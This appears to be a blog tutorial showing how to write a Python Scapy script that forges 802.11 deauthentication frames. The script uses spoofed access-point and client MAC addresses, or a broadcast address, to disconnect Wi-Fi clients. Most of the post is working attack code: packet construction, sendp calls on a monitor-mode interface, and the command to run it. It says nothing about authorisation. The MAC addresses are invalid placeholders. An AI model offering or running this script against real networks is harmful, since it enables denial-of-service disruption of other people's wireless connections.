how to create and send wireless deauthentication packets using python and scapy

Namaste Friends,



Today, In This Post I Am Going To Show You How To Create And Send De-authentication Packets Using Python And Scapy Module.


Python Scapy Module Introduction


Python Scapy Module allow Us, To Capture, Encode&Decode Packets, Sniffing, Scanning And Many Types Of Other Network Related Tasks.

Friends, This Is My Third Tutorial Based On Scapy Module. So, If You are a New Visitor Then, I Will Suggest You to take A Look On My Previous Tutorials. Also


Now, Let Start With Basic Knowledge About What Is Deauthentication Packet And What are Their Role In Wireless Connectivity.


Q 1. What is Deauthentication Packet ?

Ans. As Wikipedia Says """ The IEEE 802.11 (Wi-Fi) protocol contains the provision for a deauthentication frame. Sending the frame from the access point to a station is called a "sanctioned technique to inform a rogue station that they have been disconnected from the network".
An attacker can send a wireless access point a deauthentication frame at any time, with a spoofed address for the victim. The protocol does not require any encryption for this frame, even when the session was established with Wired Equivalent Privacy(WEP) for data privacy, and the attacker only needs to know the victim's MAC address, which is available in the clear through wireless network sniffing """


Q 2. What is the Role Of Deauthentication Frames?

Ans. As I Already Describe In Above Example, We Can Use deauthentication frames with spoofed address for Creating Distribution In Wireless Connectivity Between Client And Stations. 

So Now, Let Me Quicly Show You How To Create Deauthentication Frames Using Python Scapy Module And To Make Our Tutorial Understandable, I Wrote my Python Codes In Simple Way And For More Better Explanation Here I Am Dividing My Codes In Small Parts.


Code Part 1.




# Import Module
from scapy.all import *


Import Scapy Modules



Code Part 2.




# Access Point MAC Address
ap = "C5:JK:LL:UP:PO:8U"


MAC Address Of Access Point Or Stations. This Is Very Important Line! So, Make It Sure You Providing Correct MAC Address Of Access Point.



Code Part 3.


# Client MAC Address

client = "FF:FF:FF:FF:FF:FF" # Use This Option Only
# When You Don't Know Client Address
             # OR
client = "UJ:JU:LO:LP:OU:TB"


Here, client variable is representing Client MAC Address. In This Part, If you don't know Correct MAC Address Of Client Or Want To Target All Clients Of Stations Then You Can Use "FF:FF:FF:FF:FF:FF" Instead Of Client Original MAC Address.



Code Part 4.



# Deauthentication Packet For Access Point
pkt = RadioTap()/Dot11(addr1=client, addr2=ap, addr3=ap)/Dot11Deauth()

# Deauthentication Packet For Client
#             Use This Option Only If you Have Client MAC Address
pkt1 = RadioTap()/Dot11(addr1=ap, addr2=client, addr3=client)/Dot11Deauth()



In This Part, We Will Create Deauthentication Packets For Station And Client Also. In Order To Make A Complete Deauthentication Packets, We Need 3 Layers RadioTap, Dot11 And Dot11Deauth. As You Can See In Above Codes, With Scapy We Can Create These Layer Very Easily With The Help Of "RadioTap()/Dot11(addr1=client, addr2=ap, addr3=ap)/Dot11Deauth()"  Statements. In This Statement RadioTap() Is Representing First Layer as Wireless Packet, Dot11() is Representing Our Management layer Of Packet And Dot11Deauth() is For Creating Packet As Deauthentication Frame.

Here, In Dot11() Function We also need To Pass Few Required Arguments Like

addr1=client [Client MAC Address]
addr2=ap     [Station MAC Address]
addr3=ap     [Station MAC Address]

And Done! Now Our Deauthentication Packet For Station Is Now Ready.

You Can Also Create Packet For Client MAC Address Using Same Method But With Some Small Changes. Check Above Code To Make it Clear



Code Part 5.



# send Packets To Access Point 
sendp(pkt, iface="mon0")

# send Packet To Client
sendp(pkt1, iface="mon0")


Now, We Just Need To Send Deauthentication Packets To Their Targets And For This Work, We Will Use sendp().

In This Part, mon0 is Our Monitor Mode Enabled Wireless Interface. So, To Run These Codes Correctly, First You Need To Set Your Wireless Card In Monitor Mode. If You Don't Know How To Do It, Then Check Here Another Tutorial.


I Think Now You Got it.



Here Is My Complete Code For Creating And Sending Deauthentication Packets.


# Import Module
from scapy.all import *


# Access Point MAC Address
ap = "C5:JK:LL:UP:PO:8U"

# Client MAC Address

client = "FF:FF:FF:FF:FF:FF" # Use This Option When You Don't Know Client Address

             # OR

client = "UJ:JU:LO:LP:OU:TB"



# Deauthentication Packet For Access Point
pkt = RadioTap()/Dot11(addr1=client, addr2=ap, addr3=ap)/Dot11Deauth()

# Deauthentication Packet For Client
#             Use This Option Only If you Have Client MAC Address
pkt1 = RadioTap()/Dot11(addr1=ap, addr2=client, addr3=client)/Dot11Deauth()


# send Packets To Access Point and 
#           In Arguments, iface = monitor mode enable Interface  
sendp(pkt, iface="mon0")

# send Packet To Client
sendp(pkt1, iface="mon0")


Done!

Now, To Run These Codes Just Types below commands In terminal.

sudo python path/to/script.py


So, This Tutorial Ends Here.
In My Next Tutorial, I Will Explain You More Interesting Codes In Python for Wireless Testings.

Written By
SSB

Share this

Related Posts

Previous
Next Post »